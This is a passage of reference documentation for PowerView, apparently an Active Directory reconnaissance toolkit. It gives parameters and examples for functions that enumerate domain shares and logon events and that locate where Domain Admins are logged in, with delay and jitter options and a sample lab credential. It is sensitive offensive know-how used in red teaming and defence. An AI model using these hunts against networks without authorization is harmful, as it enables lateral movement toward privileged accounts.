-ComputerName\r\nSpecifies an array of one or more hosts to enumerate, passable on the pipeline.\r\nIf -ComputerName is not passed, the default behavior is to enumerate all machines\r\nin the domain returned by Get-DomainComputer.\r\n\r\n```yaml\r\nType: String[]\r\nParameter Sets: (All)\r\nAliases: DNSHostName\r\n\r\nRequired: False\r\nPosition: 1\r\nDefault value: None\r\nAccept pipeline input: True (ByPropertyName, ByValue)\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Domain\r\nSpecifies the domain to query for computers AND users, defaults to the current domain.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ComputerDomain\r\nSpecifies the domain to query for computers, defaults to the current domain.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ComputerLDAPFilter\r\nSpecifies an LDAP query string that is used to search for computer objects.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ComputerSearchBase\r\nSpecifies the LDAP source to search through for computers,\r\ne.g.\r\n\"LDAP://OU=secret,DC=testlab,DC=local\".\r\nUseful for OU queries.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ComputerUnconstrained\r\nSwitch.\r\nSearch computer objects that have unconstrained delegation.\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: (All)\r\nAliases: Unconstrained\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ComputerOperatingSystem\r\nSearch computers with a specific operating system, wildcards accepted.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: OperatingSystem\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ComputerServicePack\r\nSearch computers with a specific service pack, wildcards accepted.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: ServicePack\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ComputerSiteName\r\nSearch computers in the specific AD Site name, wildcards accepted.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: SiteName\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ProcessName\r\nSearch for processes with one or more specific names.\r\n\r\n```yaml\r\nType: String[]\r\nParameter Sets: TargetProcess\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -UserIdentity\r\nSpecifies one or more user identities to search for.\r\n\r\n```yaml\r\nType: String[]\r\nParameter Sets: UserIdentity, TargetUser\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -UserDomain\r\nSpecifies the domain to query for users to search for, defaults to the current domain.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: TargetUser\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -UserLDAPFilter\r\nSpecifies an LDAP query string that is used to search for target users.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: TargetUser\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -UserSearchBase\r\nSpecifies the LDAP source to search through for target users.\r\ne.g.\r\n\"LDAP://OU=secret,DC=testlab,DC=local\".\r\nUseful for OU queries.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: TargetUser\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -UserGroupIdentity\r\nSpecifies a group identity to query for target users, defaults to 'Domain Admins.\r\nIf any other user specifications are set, then UserGroupIdentity is ignored.\r\n\r\n```yaml\r\nType: String[]\r\nParameter Sets: (All)\r\nAliases: GroupName, Group\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: Domain Admins\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -UserAdminCount\r\nSwitch.\r\nSearch for users users with '(adminCount=1)' (meaning are/were privileged).\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: TargetUser\r\nAliases: AdminCount\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Server\r\nSpecifies an Active Directory server (domain controller) to bind to.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: DomainController\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -SearchScope\r\nSpecifies the scope to search under for computers, Base/OneLevel/Subtree (default of Subtree).\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: Subtree\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ResultPageSize\r\nSpecifies the PageSize to set for the LDAP searcher object.\r\n\r\n```yaml\r\nType: Int32\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: 200\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ServerTimeLimit\r\nSpecifies the maximum amount of time the server spends searching.\r\nDefault of 120 seconds.\r\n\r\n```yaml\r\nType: Int32\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: 0\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Tombstone\r\nSwitch.\r\nSpecifies that the searcher should also return deleted/tombstoned objects.\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Credential\r\nA \\[Management.Automation.PSCredential\\] object of alternate credentials\r\nfor connection to the target domain and target systems.\r\n\r\n```yaml\r\nType: PSCredential\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: [Management.Automation.PSCredential]::Empty\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -StopOnSuccess\r\nSwitch.\r\nStop hunting after finding after finding a target user.\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Delay\r\nSpecifies the delay (in seconds) between enumerating hosts, defaults to 0.\r\n\r\n```yaml\r\nType: Int32\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: 0\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Jitter\r\nSpecifies the jitter (0-1.0) to apply to any specified -Delay, defaults to +/- 0.3\r\n\r\n```yaml\r\nType: Double\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: 0.3\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Threads\r\nThe number of threads to use for user searching, defaults to 20.\r\n\r\n```yaml\r\nType: Int32\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: 20\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n## INPUTS\r\n\r\n## OUTPUTS\r\n\r\n### PowerView.UserProcess\r\n\r\n## NOTES\r\n\r\n## RELATED LINKS\r\n\r\n"
  },
  {
    "path": "docs/Recon/Find-DomainShare.md",
    "content": "# Find-DomainShare\r\n\r\n## SYNOPSIS\r\nSearches for computer shares on the domain.\r\nIf -CheckShareAccess is passed,\r\nthen only shares the current user has read access to are returned.\r\n\r\nAuthor: Will Schroeder (@harmj0y)  \r\nLicense: BSD 3-Clause  \r\nRequired Dependencies: Get-DomainComputer, Invoke-UserImpersonation, Invoke-RevertToSelf, Get-NetShare, New-ThreadedFunction\r\n\r\n## SYNTAX\r\n\r\n```\r\nFind-DomainShare [[-ComputerName] <String[]>] [-ComputerDomain <String>] [-ComputerLDAPFilter <String>]\r\n [-ComputerSearchBase <String>] [-ComputerOperatingSystem <String>] [-ComputerServicePack <String>]\r\n [-ComputerSiteName <String>] [-CheckShareAccess] [-Server <String>] [-SearchScope <String>]\r\n [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-Tombstone] [-Credential <PSCredential>]\r\n [-Delay <Int32>] [-Jitter <Double>] [-Threads <Int32>]\r\n```\r\n\r\n## DESCRIPTION\r\nThis function enumerates all machines on the current (or specified) domain\r\nusing Get-DomainComputer, and enumerates the available shares for each\r\nmachine with Get-NetShare.\r\nIf -CheckShareAccess is passed, then\r\n\\[IO.Directory\\]::GetFiles() is used to check if the current user has read\r\naccess to the given share.\r\nIf -Credential is passed, then\r\nInvoke-UserImpersonation is used to impersonate the specified user before\r\nenumeration, reverting after with Invoke-RevertToSelf.\r\n\r\n## EXAMPLES\r\n\r\n### -------------------------- EXAMPLE 1 --------------------------\r\n```\r\nFind-DomainShare\r\n```\r\n\r\nFind all domain shares in the current domain.\r\n\r\n### -------------------------- EXAMPLE 2 --------------------------\r\n```\r\nFind-DomainShare -CheckShareAccess\r\n```\r\n\r\nFind all domain shares in the current domain that the current user has\r\nread access to.\r\n\r\n### -------------------------- EXAMPLE 3 --------------------------\r\n```\r\n$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\r\n```\r\n\r\n$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)\r\nFind-DomainShare -Domain testlab.local -Credential $Cred\r\n\r\nSearches for domain shares in the testlab.local domain using the specified alternate credentials.\r\n\r\n## PARAMETERS\r\n\r\n### -ComputerName\r\nSpecifies an array of one or more hosts to enumerate, passable on the pipeline.\r\nIf -ComputerName is not passed, the default behavior is to enumerate all machines\r\nin the domain returned by Get-DomainComputer.\r\n\r\n```yaml\r\nType: String[]\r\nParameter Sets: (All)\r\nAliases: DNSHostName\r\n\r\nRequired: False\r\nPosition: 1\r\nDefault value: None\r\nAccept pipeline input: True (ByPropertyName, ByValue)\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ComputerDomain\r\nSpecifies the domain to query for computers, defaults to the current domain.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: Domain\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ComputerLDAPFilter\r\nSpecifies an LDAP query string that is used to search for computer objects.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ComputerSearchBase\r\nSpecifies the LDAP source to search through for computers,\r\ne.g.\r\n\"LDAP://OU=secret,DC=testlab,DC=local\".\r\nUseful for OU queries.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ComputerOperatingSystem\r\nSearch computers with a specific operating system, wildcards accepted.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: OperatingSystem\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ComputerServicePack\r\nSearch computers with a specific service pack, wildcards accepted.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: ServicePack\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ComputerSiteName\r\nSearch computers in the specific AD Site name, wildcards accepted.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: SiteName\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -CheckShareAccess\r\nSwitch.\r\nOnly display found shares that the local user has access to.\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: (All)\r\nAliases: CheckAccess\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Server\r\nSpecifies an Active Directory server (domain controller) to bind to.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: DomainController\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -SearchScope\r\nSpecifies the scope to search under for computers, Base/OneLevel/Subtree (default of Subtree).\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: Subtree\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ResultPageSize\r\nSpecifies the PageSize to set for the LDAP searcher object.\r\n\r\n```yaml\r\nType: Int32\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: 200\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ServerTimeLimit\r\nSpecifies the maximum amount of time the server spends searching.\r\nDefault of 120 seconds.\r\n\r\n```yaml\r\nType: Int32\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: 0\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Tombstone\r\nSwitch.\r\nSpecifies that the searcher should also return deleted/tombstoned objects.\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Credential\r\nA \\[Management.Automation.PSCredential\\] object of alternate credentials\r\nfor connection to the target domain and target systems.\r\n\r\n```yaml\r\nType: PSCredential\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: [Management.Automation.PSCredential]::Empty\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Delay\r\nSpecifies the delay (in seconds) between enumerating hosts, defaults to 0.\r\n\r\n```yaml\r\nType: Int32\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: 0\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Jitter\r\nSpecifies the jitter (0-1.0) to apply to any specified -Delay, defaults to +/- 0.3\r\n\r\n```yaml\r\nType: Double\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: 0.3\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Threads\r\nThe number of threads to use for user searching, defaults to 20.\r\n\r\n```yaml\r\nType: Int32\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: 20\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n## INPUTS\r\n\r\n## OUTPUTS\r\n\r\n### PowerView.ShareInfo\r\n\r\n## NOTES\r\n\r\n## RELATED LINKS\r\n\r\n"
  },
  {
    "path": "docs/Recon/Find-DomainUserEvent.md",
    "content": "# Find-DomainUserEvent\r\n\r\n## SYNOPSIS\r\nFinds logon events on the current (or remote domain) for the specified users.\r\n\r\nAuthor: Lee Christensen (@tifkin_), Justin Warner (@sixdub), Will Schroeder (@harmj0y)  \r\nLicense: BSD 3-Clause  \r\nRequired Dependencies: Get-DomainUser, Get-DomainGroupMember, Get-DomainController, Get-DomainUserEvent, New-ThreadedFunction\r\n\r\n## SYNTAX\r\n\r\n### Domain (Default)\r\n```\r\nFind-DomainUserEvent [-Domain <String>] [-Filter <Hashtable>] [-StartTime <DateTime>] [-EndTime <DateTime>]\r\n [-MaxEvents <Int32>] [-UserIdentity <String[]>] [-UserDomain <String>] [-UserLDAPFilter <String>]\r\n [-UserSearchBase <String>] [-UserGroupIdentity <String[]>] [-UserAdminCount] [-CheckAccess] [-Server <String>]\r\n [-SearchScope <String>] [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-Tombstone]\r\n [-Credential <PSCredential>] [-StopOnSuccess] [-Delay <Int32>] [-Jitter <Double>] [-Threads <Int32>]\r\n```\r\n\r\n### ComputerName\r\n```\r\nFind-DomainUserEvent [[-ComputerName] <String[]>] [-Filter <Hashtable>] [-StartTime <DateTime>]\r\n [-EndTime <DateTime>] [-MaxEvents <Int32>] [-UserIdentity <String[]>] [-UserDomain <String>]\r\n [-UserLDAPFilter <String>] [-UserSearchBase <String>] [-UserGroupIdentity <String[]>] [-UserAdminCount]\r\n [-CheckAccess] [-Server <String>] [-SearchScope <String>] [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>]\r\n [-Tombstone] [-Credential <PSCredential>] [-StopOnSuccess] [-Delay <Int32>] [-Jitter <Double>]\r\n [-Threads <Int32>]\r\n```\r\n\r\n## DESCRIPTION\r\nEnumerates all domain controllers from the specified -Domain\r\n(default of the local domain) using Get-DomainController, enumerates\r\nthe logon events for each using Get-DomainUserEvent, and filters\r\nthe results based on the targeting criteria.\r\n\r\n## EXAMPLES\r\n\r\n### -------------------------- EXAMPLE 1 --------------------------\r\n```\r\nFind-DomainUserEvent\r\n```\r\n\r\nSearch for any user events matching domain admins on every DC in the current domain.\r\n\r\n### -------------------------- EXAMPLE 2 --------------------------\r\n```\r\n$cred = Get-Credential dev\\administrator\r\n```\r\n\r\nFind-DomainUserEvent -ComputerName 'secondary.dev.testlab.local' -UserIdentity 'john'\r\n\r\nSearch for any user events matching the user 'john' on the 'secondary.dev.testlab.local'\r\ndomain controller using the alternate credential\r\n\r\n### -------------------------- EXAMPLE 3 --------------------------\r\n```\r\n'primary.testlab.local | Find-DomainUserEvent -Filter @{'IpAddress'='192.168.52.200|192.168.52.201'}\r\n```\r\n\r\nFind user events on the primary.testlab.local system where the event matches\r\nthe IPAddress '192.168.52.200' or '192.168.52.201'.\r\n\r\n### -------------------------- EXAMPLE 4 --------------------------\r\n```\r\n$cred = Get-Credential testlab\\administrator\r\n```\r\n\r\nFind-DomainUserEvent -Delay 1 -Filter @{'LogonGuid'='b8458aa9-b36e-eaa1-96e0-4551000fdb19'; 'TargetLogonId' = '10238128'; 'op'='&'}\r\n\r\nFind user events mathing the specified GUID AND the specified TargetLogonId, searching\r\nthrough every domain controller in the current domain, enumerating each DC in serial\r\ninstead of in a threaded manner, using the alternate credential.\r\n\r\n## PARAMETERS\r\n\r\n### -ComputerName\r\nSpecifies an explicit computer name to retrieve events from.\r\n\r\n```yaml\r\nType: String[]\r\nParameter Sets: ComputerName\r\nAliases: dnshostname, HostName, name\r\n\r\nRequired: False\r\nPosition: 1\r\nDefault value: None\r\nAccept pipeline input: True (ByPropertyName, ByValue)\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Domain\r\nSpecifies a domain to query for domain controllers to enumerate.\r\nDefaults to the current domain.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: Domain\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Filter\r\nA hashtable of PowerView.LogonEvent properties to filter for.\r\nThe 'op|operator|operation' clause can have '&', '|', 'and', or 'or',\r\nand is 'or' by default, meaning at least one clause matches instead of all.\r\nSee the exaples for usage.\r\n\r\n```yaml\r\nType: Hashtable\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -StartTime\r\nThe \\[DateTime\\] object representing the start of when to collect events.\r\nDefault of \\[DateTime\\]::Now.AddDays(-1).\r\n\r\n```yaml\r\nType: DateTime\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: [DateTime]::Now.AddDays(-1)\r\nAccept pipeline input: True (ByPropertyName)\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -EndTime\r\nThe \\[DateTime\\] object representing the end of when to collect events.\r\nDefault of \\[DateTime\\]::Now.\r\n\r\n```yaml\r\nType: DateTime\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: [DateTime]::Now\r\nAccept pipeline input: True (ByPropertyName)\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -MaxEvents\r\nThe maximum number of events (per host) to retrieve.\r\nDefault of 5000.\r\n\r\n```yaml\r\nType: Int32\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: 5000\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -UserIdentity\r\nSpecifies one or more user identities to search for.\r\n\r\n```yaml\r\nType: String[]\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -UserDomain\r\nSpecifies the domain to query for users to search for, defaults to the current domain.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -UserLDAPFilter\r\nSpecifies an LDAP query string that is used to search for target users.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -UserSearchBase\r\nSpecifies the LDAP source to search through for target users.\r\ne.g.\r\n\"LDAP://OU=secret,DC=testlab,DC=local\".\r\nUseful for OU queries.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -UserGroupIdentity\r\nSpecifies a group identity to query for target users, defaults to 'Domain Admins.\r\nIf any other user specifications are set, then UserGroupIdentity is ignored.\r\n\r\n```yaml\r\nType: String[]\r\nParameter Sets: (All)\r\nAliases: GroupName, Group\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: Domain Admins\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -UserAdminCount\r\nSwitch.\r\nSearch for users users with '(adminCount=1)' (meaning are/were privileged).\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: (All)\r\nAliases: AdminCount\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -CheckAccess\r\n{{Fill CheckAccess Description}}\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Server\r\nSpecifies an Active Directory server (domain controller) to bind to.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: DomainController\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -SearchScope\r\nSpecifies the scope to search under for computers, Base/OneLevel/Subtree (default of Subtree).\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: Subtree\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ResultPageSize\r\nSpecifies the PageSize to set for the LDAP searcher object.\r\n\r\n```yaml\r\nType: Int32\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: 200\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ServerTimeLimit\r\nSpecifies the maximum amount of time the server spends searching.\r\nDefault of 120 seconds.\r\n\r\n```yaml\r\nType: Int32\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: 0\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Tombstone\r\nSwitch.\r\nSpecifies that the searcher should also return deleted/tombstoned objects.\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Credential\r\nA \\[Management.Automation.PSCredential\\] object of alternate credentials\r\nfor connection to the target computer(s).\r\n\r\n```yaml\r\nType: PSCredential\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: [Management.Automation.PSCredential]::Empty\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -StopOnSuccess\r\nSwitch.\r\nStop hunting after finding after finding a target user.\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Delay\r\nSpecifies the delay (in seconds) between enumerating hosts, defaults to 0.\r\n\r\n```yaml\r\nType: Int32\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: 0\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Jitter\r\nSpecifies the jitter (0-1.0) to apply to any specified -Delay, defaults to +/- 0.3\r\n\r\n```yaml\r\nType: Double\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: 0.3\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Threads\r\nThe number of threads to use for user searching, defaults to 20.\r\n\r\n```yaml\r\nType: Int32\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: 20\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n## INPUTS\r\n\r\n## OUTPUTS\r\n\r\n### PowerView.LogonEvent\r\n\r\nPowerView.ExplicitCredentialLogon\r\n\r\n## NOTES\r\n\r\n## RELATED LINKS\r\n\r\n[http://www.sixdub.net/2014/11/07/offensive-event-parsing-bringing-home-trophies/](http://www.sixdub.net/2014/11/07/offensive-event-parsing-bringing-home-trophies/)\r\n\r\n"
  },
  {
    "path": "docs/Recon/Find-DomainUserLocation.md",
    "content": "# Find-DomainUserLocation\r\n\r\n## SYNOPSIS\r\nFinds domain machines where specific users are logged into.\r\n\r\nAuthor: Will Schroeder (@harmj0y)  \r\nLicense: BSD 3-Clause  \r\nRequired Dependencies: Get-DomainFileServer, Get-DomainDFSShare, Get-DomainController, Get-DomainComputer, Get-DomainUser, Get-DomainGroupMember, Invoke-UserImpersonation, Invoke-RevertToSelf, Get-NetSession, Test-AdminAccess, Get-NetLoggedon, Resolve-IPAddress, New-ThreadedFunction\r\n\r\n## SYNTAX\r\n\r\n### UserGroupIdentity (Default)\r\n```\r\nFind-DomainUserLocation [[-ComputerName] <String[]>] [-Domain <String>] [-ComputerDomain <String>]\r\n [-ComputerLDAPFilter <String>] [-ComputerSearchBase <String>] [-ComputerUnconstrained]\r\n [-ComputerOperatingSystem <String>] [-ComputerServicePack <String>] [-ComputerSiteName <String>]\r\n [-UserDomain <String>] [-UserLDAPFilter <String>] [-UserSearchBase <String>] [-UserGroupIdentity <String[]>]\r\n [-UserAdminCount] [-UserAllowDelegation] [-CheckAccess] [-Server <String>] [-SearchScope <String>]\r\n [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-Tombstone] [-Credential <PSCredential>]\r\n 